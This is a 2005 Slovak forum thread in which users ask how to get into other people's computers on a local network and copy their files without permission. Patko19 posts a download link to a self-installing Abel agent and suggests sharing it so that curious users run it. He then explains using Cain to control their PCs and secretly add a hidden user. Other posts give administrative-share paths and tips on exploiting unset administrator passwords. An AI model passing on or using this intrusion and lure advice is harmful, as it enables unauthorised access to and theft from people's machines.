Strana 1 z 2

Pristup na PC v sieti LAN

Napísané: So 15. Okt, 2005, 12:16
od užívateľa odin
je mozne sa dako dostat do pocitaca v sieti lan?akoze na hardisk a nieco od neho stahovat a tak.

Napísané: So 15. Okt, 2005, 12:18
od užívateľa pionier
ked to da zdielat tak ano

Napísané: So 15. Okt, 2005, 12:20
od užívateľa odin
no ale ked to nie je zdielane ?

Napísané: So 15. Okt, 2005, 13:01
od užívateľa w0rm0n
-----

Napísané: So 15. Okt, 2005, 15:14
od užívateľa robour
odin napísal:no ale ked to nie je zdielane ?
KeD to nie je zdielane tak to neuvidia. Zdielanie sa da zapnut jednoducho.Kliknes na zlozku ,das vlasnosti hore v okne najdes Zdielanie. Potom vtom okne stlacis povolit iba zdielanie suborov (bez sprievodcu). Vzniknu ti 2 policka . Pri zakliknuti oboch je to pristupne komplet (teda ti to mozu aj zmazat) pri zakliknuti horneho policka je to obmedzene iba na citanie a kopirovanie.

Napísané: Ne 16. Okt, 2005, 12:09
od užívateľa odin
to ja viem ale mne sa dako dostali na disk lebo ja som nemal nic zdielane .Tak aj ja sa im chcem dostat na disk .

Napísané: Ne 16. Okt, 2005, 13:02
od užívateľa Jerry
Tak sa ich spytaj, ze ako sa tam dostali ... :lol: Mozno to prezradia.

Napísané: Ne 16. Okt, 2005, 13:05
od užívateľa w0rm0n
-----

Napísané: Po 17. Okt, 2005, 18:09
od užívateľa w0rm0n
-----

Napísané: Ut 18. Okt, 2005, 18:11
od užívateľa Patko19
spravil som ti jeden samorozbalovaci rar, ktory sa sam nainstaluje ako proces.

Kód: Vybrať všetko

www.marioboy2.ic.cz/abel.exe
daj to zdielat na sieti a uvidis kolko ludi nato klikne a bude chciet vedet co to je.
potom stiahni CAIN
www.oxid.it
v caine je zabudovany aj abel, ale ten uz bude mat uplne niekto iny a cain ho detekuje na sieti a potom snim mozes ovladat cudzie PC na sieti.
napriklad si mozes cez siet unho pridat noveho uzivatela ktoreho heslo budes mat len ty a mozes sa nan bezproblemov napojit a ten chudak ani vediet nebude a ani nebude o tom uzivatelovy vediet. toto si chcel, ci nie ???
ja som si niekedy robil srandu ze som restartoval PC prikazom restart
ak by si si nahodou toho abela nainstaloval, tak ho odinstalujes prikazom v adresary c:\windows\system32
napises abel -r
r ako remove :)
priemne rabovanie HDD :)

Napísané: Št 01. Dec, 2005, 13:42
od užívateľa 5o
Rad by som vedel ako to funguje. ako sa pripojim na dalsie pc a ako rabujem jeho hdd?

Napísané: Pi 02. Dec, 2005, 10:24
od užívateľa DiwaSwina
w0rm0n napísal:No dobre...
Nastroje/pripojit sietovu jednotku
a syntax je:
bud takto \\56.6.142.153\C
alebo \\56.6.142.153\C$
potrebujes user name a password k tomu kompu Tebe sa tam asi dostali cez nezaheslovaneho administratora.
P.S. to opacne lomitko je alt+92 a cash je alt+36
mne to neslo a btw. je toto s pravidlami pretaktovania ?? neopravneny zasah do cudzieho pc ??? pokial ma firewall dostanem sa na jeho pc ??

Napísané: Pi 02. Dec, 2005, 14:09
od užívateľa Pali_Di
w0rm0n napísal:No dobre...
Nastroje/pripojit sietovu jednotku
a syntax je:
bud takto \\56.6.142.153\C
alebo \\56.6.142.153\C$
potrebujes user name a password k tomu kompu Tebe sa tam asi dostali cez nezaheslovaneho administratora.
P.S. to opacne lomitko je alt+92 a cash je alt+36
To je nic lepsi je ten prispevok od Patko19 lebo tento neni 100%ny malo kto ma nezaheslovaneho administratora na mojej sieti ktora ma cez 100 uzivatelov sa dostanem pomocou tohoto \\192.168.1.12\C$ len velmi malej casti mozno tak 2% a okrem toho Firewall ma hned odhali ze sa tam ripem 8)

Napísané: Št 08. Dec, 2005, 23:12
od užívateľa PoPKoRn
Na nasej sieti ma tez kazdy heslo.... :( Inaac to heslo ktore tam odomna pyta to je heslo ktore si uzivatel zada na svoje konto vo WIN? :)

Napísané: Pi 09. Dec, 2005, 17:33
od užívateľa Patko19
podla mna ten kazdy co ma to heslo ho vlastne vobec ma. ak je sam v domacnosti tak si nebude davat heslo sam pre seba. je to len zdrziavanie casu. a ked ma nastaveny pocitac ze sa mu sam zapina v urcitu hodinu a zacne stahovat tak by to heslo musel zadavat rucne, alebo ma autologin.
takze podla mna staci zadat heslo administrator a bude to fungovat.
ale ten cain dokaze zistit heslo aj po sieti, takze by to nemal byt problem. keby mi siel cain na x64 tak by som ti otom napisal aj dost dlhsi prispevok ako na heslo uzivatela v sieti lan ale bohuzial mi cain na tomto systeme nejde.